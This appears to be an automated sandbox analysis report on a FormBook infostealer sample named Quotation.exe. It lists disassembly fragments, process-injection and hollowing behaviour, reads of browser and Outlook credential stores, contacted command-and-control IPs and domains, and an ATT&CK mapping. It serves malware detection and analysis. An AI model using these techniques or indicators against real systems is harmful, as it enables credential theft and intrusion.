        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33527662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33527662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33527662 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356666D mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356666D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356666D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C3608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355D600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355D600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF607 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356360F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33530630 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560630 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B8633 mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B8633 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B8633 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356F63F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356F63F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DD62C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33535622 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33535622 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355D6D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335306CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FA6C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335D86C2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AC6F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AC6F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335296E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335296E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353C6E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335356E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335566E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335566E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33538690 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BC691 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF68C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33540680 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F86A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F86A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FA553 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354E547 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33566540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33568540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353254C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354C560 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B55F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B55F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33551514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33551514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33551514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33551514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33551514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33551514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BC51D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B502 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33532500 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C50D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C50D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33533536 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33533536 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33561527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356F523 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335665D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C5C6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335B05C6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BC5FC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A5E7 mov ebx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A5E7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 91.184.0.24 80
        Source: C:\Windows\explorer.exeNetwork Connect: 45.194.145.38 80
        Source: C:\Windows\explorer.exeNetwork Connect: 199.192.26.35 80
        Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.217 80
        Source: C:\Windows\explorer.exeNetwork Connect: 154.215.156.6 80
        Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.196 80
        Source: C:\Windows\explorer.exeNetwork Connect: 23.83.160.9 80
        Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
        Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80
        Source: C:\Windows\explorer.exeNetwork Connect: 88.212.206.251 80
        Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.212.220 80
        Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\Quotation.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 5D0000
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\control.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF752290000
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\control.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF752290000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\Quotation.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\Quotation.exeThread register set: target process: 4712
        Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 4712
        Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CA42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 0000000C.00000000.22639249387.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26403643909.00000000004B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +ProgmanK
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		3
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts1
        Shared Modules        		Boot or Logon Initialization Scripts1
        Access Token Manipulation        		2
        Obfuscated Files or Information        		LSASS Memory5
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)712
        Process Injection        		1
        Software Packing        		Security Account Manager121
        Security Software Discovery        		SMB/Windows Admin Shares1
        Email Collection        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Timestomp        		NTDS12
        Virtualization/Sandbox Evasion        		Distributed Component Object Model1
        Clipboard Data        		Scheduled Transfer5
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets2
        Process Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items12
        Virtualization/Sandbox Evasion        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)712
        Process Injection        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830618 Sample: Quotation.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 38 www.texasgent.com 2->38 40 www.solya-shop.com 2->40 42 20 other IPs or domains 2->42 60 Snort IDS alert for network traffic 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 6 other signatures 2->66 11 Quotation.exe 1 38 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 34 C:\Users\user\AppData\...\percentile.dll, PE32+ 11->34 dropped 36 5 other files (none is malicious) 11->36 dropped 78 Tries to detect Any.run 11->78 15 Quotation.exe 6 11->15         started        signatures6 process7 dnsIp8 50 www.wittofitentertainment.com 162.240.73.101, 443, 49854 UNIFIEDLAYER-AS-1US United States 15->50 52 Modifies the context of a thread in another process (thread injection) 15->52 54 Tries to detect Any.run 15->54 56 Maps a DLL or memory area into another process 15->56 58 2 other signatures 15->58 19 explorer.exe 2 1 15->19 injected signatures9 process10 dnsIp11 44 www.interactive-media.ru 88.212.206.251, 49858, 49921, 80 UNITEDNETRU Russian Federation 19->44 46 www.brightfms.com 81.17.18.196, 49909, 49910, 49911 PLI-ASCH Switzerland 19->46 48 12 other IPs or domains 19->48 68 System process connects to network (likely due to code injection or exploit) 19->68 23 control.exe 13 19->23         started        signatures12 process13 signatures14 70 Tries to steal Mail credentials (via file / registry access) 23->70 72 Tries to harvest and steal browser information (history, passwords, etc) 23->72 74 Writes to foreign memory regions 23->74 76 3 other signatures 23->76 26 firefox.exe 23->26         started        process15 process16 28 WerFault.exe 4 26->28         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Quotation.exe19%VirustotalBrowse
        Quotation.exe26%ReversingLabsWin32.Trojan.Generic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsi3181.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        12.2.explorer.exe.13773814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
        10.0.Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
        1.0.Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
        1.2.Quotation.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
